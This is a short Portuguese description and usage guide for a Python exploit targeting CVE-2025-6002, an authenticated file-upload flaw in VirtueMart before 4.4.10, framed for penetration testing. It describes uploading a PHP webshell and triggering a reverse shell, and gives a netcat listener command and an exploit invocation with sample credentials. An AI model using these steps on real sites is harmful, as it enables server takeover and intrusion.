
Exploit em Python para CVE-2025-6002 visando upload arbitrário de arquivos autenticado no VirtueMart < 4.4.10. Faz login, faz upload de um webshell PHP e aciona um shell reverso para testes de penetração.
Este script explora a vulnerabilidade de upload arbitrário de arquivos autenticado no VirtueMart < 4.4.10 (CVE-2025-6002), descrita neste post do blog: https://blog.blacklanternsecurity.com/p/doomla-zero-days
Este script faz login no VirtueMart com as credenciais fornecidas, cria um novo produto e envia um webshell PHP como um arquivo de mídia. Em seguida, invoca um reverse shell para o IP/porta fornecidos.
Parâmetros:
Uso:
nc -nlvp 1337
python3 exploit.py --url http://x.x.x.x --username admin --password kartoffel --remote-ip x.x.x.x --remote-port 1337